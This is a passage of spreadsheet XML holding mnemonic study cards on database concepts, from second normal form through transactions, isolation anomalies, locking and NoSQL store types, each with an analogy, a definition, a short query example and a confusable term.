        </is>
      </c>
      <c r="G724" t="inlineStr">
        <is>
          <t>2NF — 1NF is about atomic cells; 2NF is about columns depending on the whole composite key.</t>
        </is>
      </c>
      <c r="H724" t="inlineStr">
        <is>
          <t>No Russian-doll cells (dolls suggest nesting depth, not comma lists).</t>
        </is>
      </c>
      <c r="J724" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K724" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" t="n">
        <v>0</v>
      </c>
      <c r="B725" t="inlineStr">
        <is>
          <t>723</t>
        </is>
      </c>
      <c r="C725" t="inlineStr">
        <is>
          <t>Second normal form</t>
        </is>
      </c>
      <c r="D725" t="inlineStr">
        <is>
          <t>A safe that needs both keys (order_id + product_id) to open — yet 'product price' pops out with the product key alone. It never belonged in this safe; escort it to the products vault. The WHOLE key.</t>
        </is>
      </c>
      <c r="E725" t="inlineStr">
        <is>
          <t>1NF plus no partial dependency: every non-key column must depend on the whole composite key, not just part of it.</t>
        </is>
      </c>
      <c r="F725" t="inlineStr">
        <is>
          <t>order_items(order_id, product_id, qty, product_name) / product_name depends on product_id alone -&gt; partial / move it: products(product_id, product_name)</t>
        </is>
      </c>
      <c r="G725" t="inlineStr">
        <is>
          <t>3NF — 2NF removes dependencies on part of the key; 3NF removes non-key columns depending on other non-key columns.</t>
        </is>
      </c>
      <c r="H725" t="inlineStr">
        <is>
          <t>Half a ticket stub gets you in (weak: half stubs sometimes do get you in).</t>
        </is>
      </c>
      <c r="J725" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K725" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" t="n">
        <v>0</v>
      </c>
      <c r="B726" t="inlineStr">
        <is>
          <t>724</t>
        </is>
      </c>
      <c r="C726" t="inlineStr">
        <is>
          <t>Third normal form</t>
        </is>
      </c>
      <c r="D726" t="inlineStr">
        <is>
          <t>A gossip chain: the row tells zip, zip tells city — city learned the key's secret secondhand. Cut out the middleman: zip and city elope to their own table. Nothing but the key, so help me Codd.</t>
        </is>
      </c>
      <c r="E726" t="inlineStr">
        <is>
          <t>2NF plus no transitive dependency: non-key columns may not depend on other non-key columns — nothing but the key.</t>
        </is>
      </c>
      <c r="F726" t="inlineStr">
        <is>
          <t>people(id, zip, city): zip -&gt; city is transitive / split: people(id, zip) + zips(zip, city) / city stored once per zip</t>
        </is>
      </c>
      <c r="G726" t="inlineStr">
        <is>
          <t>BCNF — BCNF additionally forbids non-candidate-key determinants even when the dependent column is part of a key.</t>
        </is>
      </c>
      <c r="H726" t="inlineStr">
        <is>
          <t>Train car pulled by the wrong engine (mechanism unclear at recall time).</t>
        </is>
      </c>
      <c r="J726" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K726" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" t="n">
        <v>0</v>
      </c>
      <c r="B727" t="inlineStr">
        <is>
          <t>725</t>
        </is>
      </c>
      <c r="C727" t="inlineStr">
        <is>
          <t>Boyce-Codd normal form</t>
        </is>
      </c>
      <c r="D727" t="inlineStr">
        <is>
          <t>Bouncer-Codd at the club door: anyone caught determining anything ('this tutor fixes the course') must flash a full candidate-key membership card. Mere column cliques are thrown out and given their own venue.</t>
        </is>
      </c>
      <c r="E727" t="inlineStr">
        <is>
          <t>Stricter 3NF: every determinant (left side of any functional dependency) must be a candidate key — no exceptions.</t>
        </is>
      </c>
      <c r="F727" t="inlineStr">
        <is>
          <t>(student, course) -&gt; tutor, but tutor -&gt; course / tutor determines yet isn't a candidate key / decompose: tutors(tutor, course) + enroll(student, tutor)</t>
        </is>
      </c>
      <c r="G727" t="inlineStr">
        <is>
          <t>3NF — 3NF tolerates a non-key determinant when the dependent is part of some key; BCNF tolerates nothing.</t>
        </is>
      </c>
      <c r="H727" t="inlineStr">
        <is>
          <t>Acid-test pun on Boyce (collides with ACID at 731).</t>
        </is>
      </c>
      <c r="J727" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K727" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" t="n">
        <v>0</v>
      </c>
      <c r="B728" t="inlineStr">
        <is>
          <t>726</t>
        </is>
      </c>
      <c r="C728" t="inlineStr">
        <is>
          <t>Denormalization</t>
        </is>
      </c>
      <c r="D728" t="inlineStr">
        <is>
          <t>The barista tapes the top ten recipes to the espresso machine instead of walking to the recipe book. Pours are instant — but when HQ changes the mocha, she must remember every taped copy or serve the old drink.</t>
        </is>
      </c>
      <c r="E728" t="inlineStr">
        <is>
          <t>Deliberately duplicating or precomputing data to cut joins and speed reads, accepting extra write logic and drift risk.</t>
        </is>
      </c>
      <c r="F728" t="inlineStr">
        <is>
          <t>orders.items_count kept by trigger / vs COUNT(*) join on every page load / faster read, one more thing to keep true</t>
        </is>
      </c>
      <c r="G728" t="inlineStr">
        <is>
          <t>Unnormalized design — denormalized is a measured step back from a normalized model; unnormalized never had one.</t>
        </is>
      </c>
      <c r="H728" t="inlineStr">
        <is>
          <t>Cheat sheet tucked in the exam sleeve (moral flavor distracts from trade-off).</t>
        </is>
      </c>
      <c r="J728" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K728" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" t="n">
        <v>0</v>
      </c>
      <c r="B729" t="inlineStr">
        <is>
          <t>727</t>
        </is>
      </c>
      <c r="C729" t="inlineStr">
        <is>
          <t>Star schema</t>
        </is>
      </c>
      <c r="D729" t="inlineStr">
        <is>
          <t>A sheriff's star: the fat metal center is the fact table (every sale stamped with numbers), and each point of the star is a dimension — who bought, what item, which store, what day.</t>
        </is>
      </c>
      <c r="E729" t="inlineStr">
        <is>
          <t>Analytics layout: a central fact table of measured events joined to small denormalized dimension tables — who, what, when, where.</t>
        </is>
      </c>
      <c r="F729" t="inlineStr">
        <is>
          <t>fact_sales(date_id, store_id, product_id, qty, rev) / dim_date, dim_store, dim_product / query: join facts to a few dims, aggregate</t>
        </is>
      </c>
      <c r="G729" t="inlineStr">
        <is>
          <t>Snowflake schema — snowflake re-normalizes dimensions into sub-tables; star keeps each dimension flat and wide.</t>
        </is>
      </c>
      <c r="H729" t="inlineStr">
        <is>
          <t>Solar system with planet lookups (orbits suggest motion, not joins).</t>
        </is>
      </c>
      <c r="J729" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K729" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" t="n">
        <v>0</v>
      </c>
      <c r="B730" t="inlineStr">
        <is>
          <t>728</t>
        </is>
      </c>
      <c r="C730" t="inlineStr">
        <is>
          <t>Surrogate vs natural keys</t>
        </is>
      </c>
      <c r="D730" t="inlineStr">
        <is>
          <t>The prison files inmates by number, not name: names get remarried, misspelled, and duplicated; number 24601 never changes no matter what Jean Valjean calls himself this year.</t>
        </is>
      </c>
      <c r="E730" t="inlineStr">
        <is>
          <t>Surrogate keys are meaningless generated IDs; natural keys are real-world attributes whose meaning can change, collide, or leak.</t>
        </is>
      </c>
      <c r="F730" t="inlineStr">
        <is>
          <t>id BIGSERIAL PRIMARY KEY -- surrogate / vs PRIMARY KEY (email) -- natural / email changes -&gt; every referencing FK must change</t>
        </is>
      </c>
      <c r="G730" t="inlineStr">
        <is>
          <t>UUID vs auto-increment — both are surrogates; that choice is about generation and index locality, not business meaning.</t>
        </is>
      </c>
      <c r="H730" t="inlineStr">
        <is>
          <t>SSN as the key (SSN is itself a cautionary natural key — confusing as an anchor).</t>
        </is>
      </c>
      <c r="J730" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K730" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" t="n">
        <v>0</v>
      </c>
      <c r="B731" t="inlineStr">
        <is>
          <t>729</t>
        </is>
      </c>
      <c r="C731" t="inlineStr">
        <is>
          <t>EAV antipattern</t>
        </is>
      </c>
      <c r="D731" t="inlineStr">
        <is>
          <t>A furniture store that sells every chair as a bin of loose screws with sticky notes: 'color: red', 'legs: 4'. Infinitely flexible shelving — but rebuilding one chair takes forty trips, and nothing stops 'legs: banana'.</t>
        </is>
      </c>
      <c r="E731" t="inlineStr">
        <is>
          <t>Storing data as generic entity-attribute-value rows for 'flexibility', losing types, constraints, and sane queries in the bargain.</t>
        </is>
      </c>
      <c r="F731" t="inlineStr">
        <is>
          <t>attrs(entity_id, attr, value) / (42,'color','red'), (42,'legs','4') -- all TEXT / one product = N self-joins; no CHECK possible</t>
        </is>
      </c>
      <c r="G731" t="inlineStr">
        <is>
          <t>JSONB column — a typed, indexable document kept in one row; EAV shreds each attribute into its own untyped row.</t>
        </is>
      </c>
      <c r="H731" t="inlineStr">
        <is>
          <t>Junk drawer of Post-its (junk drawer is reserved for schema-on-read).</t>
        </is>
      </c>
      <c r="J731" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K731" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" t="n">
        <v>0</v>
      </c>
      <c r="B732" t="inlineStr">
        <is>
          <t>730</t>
        </is>
      </c>
      <c r="C732" t="inlineStr">
        <is>
          <t>Transaction</t>
        </is>
      </c>
      <c r="D732" t="inlineStr">
        <is>
          <t>A magician's tablecloth yank: either the whole new table setting appears in one motion, or the trick fails and every plate is exactly where it was. The audience never sees half-moved cutlery.</t>
        </is>
      </c>
      <c r="E732" t="inlineStr">
        <is>
          <t>A group of statements executed as one all-or-nothing unit: COMMIT makes all of it visible; ROLLBACK erases every trace.</t>
        </is>
      </c>
      <c r="F732" t="inlineStr">
        <is>
          <t>BEGIN; / UPDATE acc SET bal=bal-100 WHERE id=1; / UPDATE acc SET bal=bal+100 WHERE id=2; COMMIT;</t>
        </is>
      </c>
      <c r="G732" t="inlineStr">
        <is>
          <t>Single autocommit statement — each statement is already its own tiny transaction; BEGIN binds several into one fate.</t>
        </is>
      </c>
      <c r="H732" t="inlineStr">
        <is>
          <t>Airlock with both doors (airlocks encode sequencing, not atomicity).</t>
        </is>
      </c>
      <c r="J732" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K732" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" t="n">
        <v>0</v>
      </c>
      <c r="B733" t="inlineStr">
        <is>
          <t>731</t>
        </is>
      </c>
      <c r="C733" t="inlineStr">
        <is>
          <t>ACID properties</t>
        </is>
      </c>
      <c r="D733" t="inlineStr">
        <is>
          <t>Drop a committed transaction into a vat of acid: it stays in one piece (A), keeps its lawful shape (C), doesn't react with its vat-mates (I), and the etching it leaves is permanent (D).</t>
        </is>
      </c>
      <c r="E733" t="inlineStr">
        <is>
          <t>Atomicity (all or nothing), Consistency (rules still hold), Isolation (concurrent txns don't interfere), Durability (committed survives crashes).</t>
        </is>
      </c>
      <c r="F733" t="inlineStr">
        <is>
          <t>Crash between debit and credit -&gt; both roll back (A) / CHECK bal &gt;= 0 still true after (C) / power cut after COMMIT -&gt; transfer survives (D)</t>
        </is>
      </c>
      <c r="G733" t="inlineStr">
        <is>
          <t>BASE — BASE systems trade per-transaction guarantees for availability, converging eventually instead of immediately.</t>
        </is>
      </c>
      <c r="H733" t="inlineStr">
        <is>
          <t>Invisible-ink lemon juice (fading ink contradicts durability).</t>
        </is>
      </c>
      <c r="J733" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K733" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" t="n">
        <v>0</v>
      </c>
      <c r="B734" t="inlineStr">
        <is>
          <t>732</t>
        </is>
      </c>
      <c r="C734" t="inlineStr">
        <is>
          <t>Dirty read</t>
        </is>
      </c>
      <c r="D734" t="inlineStr">
        <is>
          <t>Reading a friend's essay over their shoulder mid-edit and quoting a sentence they delete a second later — your citation points at words that never made the published page.</t>
        </is>
      </c>
      <c r="E734" t="inlineStr">
        <is>
          <t>Reading another transaction's uncommitted changes; if it rolls back, you acted on data that never officially existed.</t>
        </is>
      </c>
      <c r="F734" t="inlineStr">
        <is>
          <t>T1: UPDATE acc SET bal=0 (not committed) / T2: SELECT bal -&gt; 0, ships a refund / T1: ROLLBACK -- T2 refunded money that never moved</t>
        </is>
      </c>
      <c r="G734" t="inlineStr">
        <is>
          <t>Non-repeatable read — that one re-reads committed changes; a dirty read sees changes that were never committed at all.</t>
        </is>
      </c>
      <c r="H734" t="inlineStr">
        <is>
          <t>Reading tomorrow's newspaper before printing (weaker cause-and-effect).</t>
        </is>
      </c>
      <c r="J734" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K734" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" t="n">
        <v>0</v>
      </c>
      <c r="B735" t="inlineStr">
        <is>
          <t>733</t>
        </is>
      </c>
      <c r="C735" t="inlineStr">
        <is>
          <t>Non-repeatable read</t>
        </is>
      </c>
      <c r="D735" t="inlineStr">
        <is>
          <t>You check the hotel room price, walk off to fetch your wallet, and return to the same screen in the same session — the same room now costs more. Same row, same query, two answers.</t>
        </is>
      </c>
      <c r="E735" t="inlineStr">
        <is>
          <t>Within one transaction, re-reading the same row returns a different value because another transaction committed an update in between.</t>
        </is>
      </c>
      <c r="F735" t="inlineStr">
        <is>
          <t>T1: SELECT price WHERE id=7 -&gt; 100 / T2: UPDATE price=120; COMMIT / T1: SELECT price WHERE id=7 -&gt; 120 (same txn)</t>
        </is>
      </c>
      <c r="G735" t="inlineStr">
        <is>
          <t>Phantom read — phantom is new rows appearing in a re-run range query; non-repeatable is one existing row changing value.</t>
        </is>
      </c>
      <c r="H735" t="inlineStr">
        <is>
          <t>Heraclitus' river, never the same row twice (too philosophical to discriminate).</t>
        </is>
      </c>
      <c r="J735" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K735" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" t="n">
        <v>0</v>
      </c>
      <c r="B736" t="inlineStr">
        <is>
          <t>734</t>
        </is>
      </c>
      <c r="C736" t="inlineStr">
        <is>
          <t>Phantom read</t>
        </is>
      </c>
      <c r="D736" t="inlineStr">
        <is>
          <t>You count twelve ghosts in the ballroom, blink, count again: thirteen. None of the originals changed — a phantom matching your WHERE clause materialized between counts.</t>
        </is>
      </c>
      <c r="E736" t="inlineStr">
        <is>
          <t>Re-running a range query inside one transaction returns new rows that another transaction inserted and committed meanwhile.</t>
        </is>
      </c>
      <c r="F736" t="inlineStr">
        <is>
          <t>T1: SELECT COUNT(*) WHERE age&gt;60 -&gt; 12 / T2: INSERT senior; COMMIT / T1: same COUNT -&gt; 13; a new row appeared</t>
        </is>
      </c>
      <c r="G736" t="inlineStr">
        <is>
          <t>Non-repeatable read — that is an existing row changing; phantom is the membership of the result set changing.</t>
        </is>
      </c>
      <c r="H736" t="inlineStr">
        <is>
          <t>Whack-a-mole rows (moles also disappear — phantoms only appear).</t>
        </is>
      </c>
      <c r="J736" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K736" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" t="n">
        <v>0</v>
      </c>
      <c r="B737" t="inlineStr">
        <is>
          <t>735</t>
        </is>
      </c>
      <c r="C737" t="inlineStr">
        <is>
          <t>Isolation levels</t>
        </is>
      </c>
      <c r="D737" t="inlineStr">
        <is>
          <t>Hotel privacy tiers: glass walls (neighbors see your dirty drafts), curtains (you see only finished rooms), a locked door (your view frozen at check-in), and a private floor where stays replay as if guests came one at a time.</t>
        </is>
      </c>
      <c r="E737" t="inlineStr">
        <is>
          <t>A ladder trading anomalies for concurrency: read uncommitted, read committed, repeatable read, serializable — each rung blocks more anomalies.</t>
        </is>
      </c>
      <c r="F737" t="inlineStr">
        <is>
          <t>SET TRANSACTION ISOLATION LEVEL REPEATABLE READ; / Postgres default: READ COMMITTED / serializable may abort: catch and retry</t>
        </is>
      </c>
      <c r="G737" t="inlineStr">
        <is>
          <t>Consistency (the C in ACID) — that is about domain rules holding; isolation is about what concurrent transactions can see.</t>
        </is>
      </c>
      <c r="H737" t="inlineStr">
        <is>
          <t>Volume knob on interference (a knob lacks the four named stops).</t>
        </is>
      </c>
      <c r="J737" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K737" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" t="n">
        <v>0</v>
      </c>
      <c r="B738" t="inlineStr">
        <is>
          <t>736</t>
        </is>
      </c>
      <c r="C738" t="inlineStr">
        <is>
          <t>Optimistic locking</t>
        </is>
      </c>
      <c r="D738" t="inlineStr">
        <is>
          <t>Two wiki editors type freely on the same page. On save, the site compares version numbers: first saver wins; the second sees 'page changed since you loaded it — reapply'. Nobody waited; one redid work.</t>
        </is>
      </c>
      <c r="E738" t="inlineStr">
        <is>
          <t>Proceed without locks; at write time verify a version or timestamp hasn't changed — if it has, abort and retry. Best when conflicts are rare.</t>
        </is>
      </c>
      <c r="F738" t="inlineStr">
        <is>
          <t>UPDATE docs SET body=:new, version=version+1 / WHERE id=7 AND version=:seen; / -- 0 rows updated =&gt; conflict: reload and retry</t>
        </is>
      </c>
      <c r="G738" t="inlineStr">
        <is>
          <t>Pessimistic locking — pessimism blocks rivals up front; optimism never blocks and detects conflicts at commit time.</t>
        </is>
      </c>
      <c r="H738" t="inlineStr">
        <is>
          <t>Handshake deal checked by a notary later (notary timing too vague).</t>
        </is>
      </c>
      <c r="J738" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K738" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" t="n">
        <v>0</v>
      </c>
      <c r="B739" t="inlineStr">
        <is>
          <t>737</t>
        </is>
      </c>
      <c r="C739" t="inlineStr">
        <is>
          <t>Pessimistic locking</t>
        </is>
      </c>
      <c r="D739" t="inlineStr">
        <is>
          <t>The office bathroom-key school of concurrency: take the key off the hook before you go; everyone else shuffles in the hallway, even those who only wanted to check the mirror.</t>
        </is>
      </c>
      <c r="E739" t="inlineStr">
        <is>
          <t>Acquire the lock before touching the data so no rival can modify (or lock) it until you finish; everyone else queues.</t>
        </is>
      </c>
      <c r="F739" t="inlineStr">
        <is>
          <t>BEGIN; / SELECT * FROM inventory WHERE sku='A1' FOR UPDATE; / -- rival writers block here until COMMIT</t>
        </is>
      </c>
      <c r="G739" t="inlineStr">
        <is>
          <t>Optimistic locking — optimism lets everyone work and rejects late writers; pessimism makes late arrivals wait at the door.</t>
        </is>
      </c>
      <c r="H739" t="inlineStr">
        <is>
          <t>Calling dibs on the last slice (dibs isn't enforced — locks are).</t>
        </is>
      </c>
      <c r="J739" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K739" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" t="n">
        <v>0</v>
      </c>
      <c r="B740" t="inlineStr">
        <is>
          <t>738</t>
        </is>
      </c>
      <c r="C740" t="inlineStr">
        <is>
          <t>SELECT FOR UPDATE</t>
        </is>
      </c>
      <c r="D740" t="inlineStr">
        <is>
          <t>You lay your flat hand on the bakery's last éclair while fishing out your wallet. Everyone may still look at it, but nobody can grab or reprice it until you finish paying (COMMIT).</t>
        </is>
      </c>
      <c r="E740" t="inlineStr">
        <is>
          <t>A row-locking read inside a transaction: locks the selected rows so your read-then-write sequence can't be interleaved by rivals.</t>
        </is>
      </c>
      <c r="F740" t="inlineStr">
        <is>
          <t>BEGIN; / SELECT bal FROM acc WHERE id=1 FOR UPDATE; / UPDATE acc SET bal=bal-100 WHERE id=1; COMMIT;</t>
        </is>
      </c>
      <c r="G740" t="inlineStr">
        <is>
          <t>Plain SELECT in a transaction — ordinary reads take no row locks; FOR UPDATE holds the rows until commit.</t>
        </is>
      </c>
      <c r="H740" t="inlineStr">
        <is>
          <t>Reserved parking cone (cones get moved; row locks don't).</t>
        </is>
      </c>
      <c r="J740" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K740" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" t="n">
        <v>0</v>
      </c>
      <c r="B741" t="inlineStr">
        <is>
          <t>739</t>
        </is>
      </c>
      <c r="C741" t="inlineStr">
        <is>
          <t>Transaction deadlock</t>
        </is>
      </c>
      <c r="D741" t="inlineStr">
        <is>
          <t>Two overpolite people wedged in a doorway, each holding the door the other needs, bowing 'after you' forever — until the manager (the engine) shoves one back outside (abort) so the other passes; the ejected one retries.</t>
        </is>
      </c>
      <c r="E741" t="inlineStr">
        <is>
          <t>Two transactions each hold a lock the other needs, waiting forever; the database detects the cycle and aborts one as the victim.</t>
        </is>
      </c>
      <c r="F741" t="inlineStr">
        <is>
          <t>T1: locks row A, wants B / T2: locks row B, wants A / ERROR: deadlock detected -- fix: lock rows in same order</t>
        </is>
      </c>
      <c r="G741" t="inlineStr">
        <is>
          <t>Ordinary lock wait — blocking ends when the holder commits; a deadlock is a cycle only a victim abort can break. | cf. 530 Deadlock (déjà pris): same wait cycle, but the database detects it and kills one victim transaction automatically</t>
        </is>
      </c>
      <c r="H741" t="inlineStr">
        <is>
          <t>Gridlocked intersection (the stock OS-course image; the doorway bow is fresher).</t>
        </is>
      </c>
      <c r="J741" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K741" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" t="n">
        <v>0</v>
      </c>
      <c r="B742" t="inlineStr">
        <is>
          <t>740</t>
        </is>
      </c>
      <c r="C742" t="inlineStr">
        <is>
          <t>NoSQL databases</t>
        </is>
      </c>
      <c r="D742" t="inlineStr">
        <is>
          <t>Across from the strict relational cafeteria, a food-truck park: each truck serves one dish its own way — no shared menu, no table service, no substitutions, and the lines fly.</t>
        </is>
      </c>
      <c r="E742" t="inlineStr">
        <is>
          <t>Non-relational stores that give up joins, strict schemas, or full ACID to win scale, flexibility, or speed for specific access patterns.</t>
        </is>
      </c>
      <c r="F742" t="inlineStr">
        <is>
          <t>Redis (key-value), MongoDB (document), / Cassandra (wide-column), Neo4j (graph) / pick per workload, not by fashion</t>
        </is>
      </c>
      <c r="G742" t="inlineStr">
        <is>
          <t>NewSQL — NewSQL keeps SQL and ACID while scaling out; NoSQL changes the data model itself.</t>
        </is>
      </c>
      <c r="H742" t="inlineStr">
        <is>
          <t>Wild-west data saloon (lawlessness overstates it; each store has strict rules).</t>
        </is>
      </c>
      <c r="J742" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K742" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" t="n">
        <v>0</v>
      </c>
      <c r="B743" t="inlineStr">
        <is>
          <t>741</t>
        </is>
      </c>
      <c r="C743" t="inlineStr">
        <is>
          <t>Key-value store</t>
        </is>
      </c>
      <c r="D743" t="inlineStr">
        <is>
          <t>A wall of gym lockers: present exactly key #417 and get your bag. Ask the attendant 'which lockers contain red jackets?' and he just stares — lockers are opaque; only keys open anything.</t>
        </is>
      </c>
      <c r="E743" t="inlineStr">
        <is>
          <t>Stores an opaque value under a unique key; you can GET, SET, and DELETE by exact key but never query inside the value.</t>
        </is>
      </c>
      <c r="F743" t="inlineStr">
        <is>
          <t>SET session:abc '{user:7}' EX 3600 / GET session:abc -&gt; '{user:7}' / -- no WHERE, no query by value</t>
        </is>
      </c>
      <c r="G743" t="inlineStr">
        <is>
          <t>Document store — documents are queryable and indexable by inner fields; a KV value is a sealed blob.</t>
        </is>
      </c>
      <c r="H743" t="inlineStr">
        <is>
          <t>Valet claim ticket (coat-check already anchors foreign keys).</t>
        </is>
      </c>
      <c r="J743" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K743" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" t="n">
        <v>0</v>
      </c>
      <c r="B744" t="inlineStr">
        <is>
          <t>742</t>
        </is>
      </c>
      <c r="C744" t="inlineStr">
        <is>
          <t>Document database</t>
        </is>
      </c>
      <c r="D744" t="inlineStr">
        <is>
          <t>Each customer is one manila folder: orders stapled inside, addresses paper-clipped to the flap. You pull the whole folder in one motion — no reassembling a person from ten separate drawers.</t>
        </is>
      </c>
      <c r="E744" t="inlineStr">
        <is>
          <t>Stores JSON-like documents with nested structure, indexed and queried by inner fields; the document is the unit of atomicity.</t>
        </is>
      </c>
      <c r="F744" t="inlineStr">
        <is>
          <t>db.users.find({'address.city': 'Oslo'}) / db.users.updateOne({_id:7}, {$push:{orders:o}}) / -- one document updated atomically</t>
        </is>
      </c>
      <c r="G744" t="inlineStr">
        <is>
          <t>Key-value store — KV can't see inside its values; a document DB indexes and filters on nested fields.</t>
        </is>
      </c>
      <c r="H744" t="inlineStr">
        <is>
          <t>Russian nesting dolls (nesting yes, but retrieval-as-one-unit is lost).</t>
        </is>
      </c>
      <c r="J744" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K744" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" t="n">
        <v>0</v>
      </c>
      <c r="B745" t="inlineStr">
        <is>
          <t>743</t>
        </is>
      </c>
      <c r="C745" t="inlineStr">
        <is>
          <t>Wide-column store</t>
        </is>
      </c>
      <c r="D745" t="inlineStr">
        <is>
          <t>A mile-wide spreadsheet where each row grows its own private set of labeled columns; the wall is sawn into panels by row key and the panels are shipped to different warehouses (partitions).</t>
        </is>
      </c>
      <c r="E745" t="inlineStr">
        <is>
          <t>Rows keyed by a partition key hold sparse dynamic columns sorted by a clustering key; built for huge, write-heavy, partitioned workloads.</t>
        </is>
      </c>
      <c r="F745" t="inlineStr">
        <is>
          <t>Cassandra: PRIMARY KEY ((user_id), ts) / partition by user, rows time-sorted inside / great: feeds, sensor series; bad: ad-hoc joins</t>
        </is>
      </c>
      <c r="G745" t="inlineStr">
        <is>
          <t>Columnar format (Parquet) — despite the name, wide-column stores are row-oriented per partition; columnar is a scan-optimized file layout.</t>
        </is>
      </c>
      <c r="H745" t="inlineStr">
        <is>
          <t>Hotel corridor of doors per guest (spatial metaphor tangles rows and columns).</t>
        </is>
      </c>
      <c r="J745" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K745" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" t="n">
        <v>0</v>
      </c>
      <c r="B746" t="inlineStr">
        <is>
          <t>744</t>
        </is>
      </c>
      <c r="C746" t="inlineStr">
        <is>
          <t>Graph database</t>
        </is>
      </c>
      <c r="D746" t="inlineStr">
        <is>
          <t>A detective's corkboard: photos (nodes) joined by red string (edges). 'Friend of a friend of a friend' is walking three strings with your finger — no re-sorting file cabinets (joins) at every hop.</t>
        </is>
      </c>
      <c r="E746" t="inlineStr">
        <is>
          <t>Nodes and edges are first-class records with direct pointers, so multi-hop relationship traversals stay fast regardless of dataset size.</t>
        </is>
      </c>
      <c r="F746" t="inlineStr">
        <is>
          <t>MATCH (a:Person {name:'Ada'})-[:FRIEND*2..2]-&gt;(f) / RETURN f.name / -- friends-of-friends in one traversal</t>
        </is>
      </c>
      <c r="G746" t="inlineStr">
        <is>
          <t>Join table in SQL — models the same edges, but each hop costs a join; graph engines follow stored pointers per hop.</t>
        </is>
      </c>
      <c r="H746" t="inlineStr">
        <is>
          <t>Subway map of relationships (maps are static; traversal is the whole point).</t>
        </is>
      </c>
      <c r="J746" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K746" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" t="n">
        <v>0</v>
      </c>
      <c r="B747" t="inlineStr">
        <is>
          <t>745</t>
        </is>
      </c>
      <c r="C747" t="inlineStr">
        <is>
          <t>BASE consistency model</t>
        </is>
      </c>
      <c r="D747" t="inlineStr">
        <is>
          <t>The alkaline answer to ACID: a spilled BASE spreads slowly across the lab counter until it evenly coats it (replicas converge eventually) — and the counter stays usable the whole time (available).</t>
        </is>
      </c>
      <c r="E747" t="inlineStr">
        <is>
          <t>Basically Available, Soft state, Eventually consistent: replicas may briefly disagree but converge; availability beats instant consistency.</t>
